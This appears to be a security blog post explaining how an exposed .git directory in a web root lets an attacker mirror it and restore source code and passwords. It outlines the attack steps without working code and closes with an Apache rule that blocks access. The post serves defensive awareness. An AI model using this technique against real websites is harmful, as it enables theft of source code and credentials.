Git clone — A devil in disguise
So you or your company make this fresh new website, the code has been reviewed for security vulnerabilities and you’re confident it’s the most secure thing you’ve built so far. The passwords in your configuration files are strong and your server has all security patches installed. So what do you do?
root@production# git clone git@git-server.com:company/website.git
root@production# service apache2 start
Yet within 10 minutes of it being live, someone plunders your database, steals your source code and defaces your brand new website. What happened?! Well, you might want to look at that first command again.
More specifically, the git clone
part. What you might have missed is that you just created a hidden directory in your web-root, with all of your source code, configuration files and changes you’ve ever made to your project. We’re talking of course, about the .git
directory.
So what? It’s just a directory with a bunch of random binary files, who cares? Well, git does. Git doesn’t just keep track of your code magically, it does it using that exact directory, every line of code you ever wrote on that project is in there. Including any hard-coded password and potential vulnerability you ever created, and it’s there for the entire world to see.
All an attacker needs to do is download it, tell git to put all the files back, and they’ll have full access to all of your source code, not to mention all of the internal email addresses of every developer that worked on that project.
Proof of concept
So how would an attack like this look like from the attackers’ perspective? They would start out by simply probing your website for an exposed .git
directory, in the following example I set up my own local web server that was intentionally vulnerable.
Once the attacker knows your website allows requests to the .git
directory, they need to mirror the directory itself:
This is where things get scary, the attacker can now list every single file that you’ve ever added to git. A simple git status
is more than enough to find out what files you have in store for them:
And now for the part that could ruin your business. Exposing the source code and passwords that are buried within. Simply checking out the files they want to read is enough to expose your source code.
Fixing the problem
Not all is lost, there’s a solution to every problem. There are a few ways to mitigate this, the first would be to simply not have your entire .git
folder in your web-root in the first place.
The second way you could fix this is by using a file called .htaccess
or your 000-default.conf
file, they allow you to configure your web server to treat certain files and directories differently (it can do a lot more than that, but right now that’s not relevant). Simply add the following to prevent any access to your .git
directory:
# Prevent access to publicly visisble '.git' directories
<DirectoryMatch "(\.git)">
Deny from all
Options -Indexes
</DirectoryMatch>
And that’s it! Hopefully you’ll think twice about cloning your entire project and releasing it, simply following these steps will save you a lot of time and money in the long run.